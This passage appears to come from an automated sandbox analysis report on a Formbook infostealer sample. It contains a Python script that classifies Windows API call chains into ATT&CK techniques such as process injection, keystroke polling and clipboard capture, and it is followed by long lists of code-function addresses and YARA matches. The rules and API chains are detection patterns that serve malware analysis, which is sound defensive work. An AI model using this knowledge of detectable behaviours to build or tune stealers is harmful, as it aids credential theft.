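     {"NtSuspendThread", "NtSetContextThread", "NtResumeThread"}),
    ("T1055.004", "APC injection", {"NtQueueApcThread"}),
    ("T1115", "clipboard capture", {"OpenClipboard", "GetClipboardData"}),
    ("T1056.001", "keystroke polling", {"GetAsyncKeyState"}),
    ("T1056.001", "keystroke polling", {"GetKeyboardState"}),
    ("T1134.002", "create process with duplicated token",
     {"DuplicateTokenEx", "CreateProcessAsUserW"}),
    ("T1529", "system shutdown/reboot", {"ExitWindowsEx"}),
]

# Matches "Source: <image> | Code function: <ref> <api,api,...>" and the unseparated variant.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.*?)\s*\|?\s*Code function:\s*"
    r"(?P<ref>\d+_\d+_[0-9A-Fa-f]+):?\s*(?P<rest>.*)")
REF_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")

# Evidence lines copied from this report.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F16B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F02B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose",
    r"Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03099BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F06685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00F06685",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock",
]


def parse_code_function(line):
    """Split one evidence line into (process image, function reference, API call list)."""
    m = LINE_RE.search(line)
    if not m:
        return None
    apis = [t.strip() for t in m.group("rest").split(",")]
    # Drop empty tokens and the trailing duplicate of the function reference.
    apis = [t for t in apis if t and not REF_RE.match(t)]
    return m.group("proc"), m.group("ref"), apis


def classify(lines):
    """Map every function reference to the techniques its API chain satisfies."""
    results = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        proc, ref, apis = parsed
        present = set(apis)
        techniques = sorted({(tid, label) for tid, label, needed in RULES if needed <= present})
        results[ref] = {"process": proc, "apis": apis, "techniques": techniques}
    return results


def techniques_by_process(results):
    """Roll the per-function hits up to the process image that contained the code."""
    summary = {}
    for info in results.values():
        summary.setdefault(info["process"], set()).update(tid for tid, _ in info["techniques"])
    return summary


if __name__ == "__main__":
    results = classify(REPORT_LINES)
    for ref, info in results.items():
        labels = ", ".join("%s %s" % t for t in info["techniques"]) or "-"
        print("%-14s %-40s %s" % (ref, info["process"].rsplit("\\", 1)[-1], labels))
    for proc, tids in techniques_by_process(results).items():
        print(proc, sorted(tids))
```

          Feeding the whole report through classify() rather than the six lines embedded here shows the division of labour in this sample: the injection techniques are attributed only to the svchost.exe and wlanext.exe code (where Formbook runs), while the clipboard, keyboard and CreateProcessAsUserW chains belong to the AutoIt stub in file.exe and would also be present in a benign compiled AutoIt script.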
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEB043
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF410F
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE02A4
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECE3B0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF038E
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE06D9
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF467F
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F2AACE
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF4BEF
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EECCC1
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECAF50
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC6F07
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F231BC
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EED1B9
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDB11F
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF724D
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE123A
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3200
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC93F0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F013CA
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDF563
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC96C0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0B6CC
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F2F7FF
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC77B0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF79C9
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDFA57
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC9B60
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3B70
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC7D19
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE9ED0
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDFE6F
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC7FA3
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0116EE50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC02C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030003E6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4E3F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFA352
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030001AA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF81CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC8158
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30100
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5C6E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3C7C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F64750
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEE4F6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03000591
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2446
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF6BD7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFAB40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E8F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F268B8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300A9A6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4A840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F42840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFEEDB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52E90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFCE93
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40E59
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFEE26
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F32FC8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBEFA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB4F40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F60F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F82F28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30CF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0CB5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3ADE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F58DBF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDCD1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4AD00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5D2F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE12ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5B2C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F452A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F8739A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2D34C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF132D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF70E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF0E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEF0CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F470C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300B16B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4B1B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2F172
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7516C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF16CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF7B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F31460
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF43F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDD5B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7571
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEDAC6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDDAAC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F85AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB3A6C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFA49
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7A46
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB5BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7DBF9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5FB80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFB76
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F438E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAD800
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F49950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5B950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD5910
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F49EB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFFB1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F41F92
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFF09
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFCF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB9C32
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5FDC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7D73
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF1D5A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F43D40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02491030
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AE7A4
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02499E5C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02499E60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024ADF13
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02492FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AEDDB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02492D87
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02492D90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0A036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0B232
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E01082
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0E5CD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E05B30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E05B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E089121_2_02E08912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E02D021_2_02E02D02
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BB232
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BA036
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5B1082
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5B8912
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5B2D02
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5B5B32
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5B5B30
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BE5CD
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F63BB32
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F63BB30
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F641232
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F638D02
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F63E912
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F6445CD
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F640036
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F637082
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332A352
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033303E6
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0327E3F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03310274
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032F02C0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03260100
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0330A118
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032F8158
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033241A2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033301AA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033281CC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03302000
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03270770
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03294750
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0326C7C0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0328C6E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03270535
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03330591
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03314420
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03322446
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0331E4F6
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332AB40
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03326BD7
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0326EA80
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03286962
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032729A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0333A9A6
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03272840
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0327A840
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032568B8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0329E8F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03312F30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032B2F28
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03290F30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032E4F40
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032EEFA0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03262FC8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332EE26
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03270E59
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332CE93
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03282E90
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332EEDB
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0327AD00
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0330CD1F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03288DBF
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0326ADE0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03270C00
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03310CB5
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03260CF2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332132D
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0325D34C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032B739A
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032752A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0328D2F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033112ED
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0328B2C0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A516C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0325F172
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0333B16B
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0327B1B0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332F0E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033270E9
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032770C0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0331F0CC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332F7B0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032B5630
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033216CC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03327571
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0330D5B0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_033395C3
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332F43F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03261460
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332FB76
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0328FB80
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032ADBF9
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032E5BF0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032E3A6C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03327A46
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332FA49
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032B5AA0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03311AA3
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0330DAAC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0331DAC6
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03305910
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03279950
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0328B950
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032DD800
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032738E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332FF09
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332FFB1
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03271F92
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03233FD2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03233FD5
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03279EB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03327D73
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03273D40
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03321D5A
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0328FDC0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032E9C32
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0332FCF2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABE7A4
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00AA2D87
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00AA2D90
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00AA9E60
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00AA9E5C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00AA2FB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0309A036
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03095B30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03095B32
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0309B232
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03098912
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03091082
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03092D02
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0309E5CD
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 032B7E54 appears 107 times
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 032EF290 appears 103 times
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 032DEA12 appears 86 times
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 032A5130 appears 58 times
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0325B970 appears 262 times
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 00DD650B appears 97 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FBF290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F75130 appears 57 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F87E54 appears 98 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F2B970 appears 257 times
          Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EDEC2F appears 68 times
          Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EEF8A0 appears 35 times
          Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EE6AC0 appears 42 times
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640
          Source: file.exe, 00000000.00000003.1653421088.0000000003BBD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
          Source: file.exe, 00000000.00000003.1652908922.0000000003A13000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
          Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
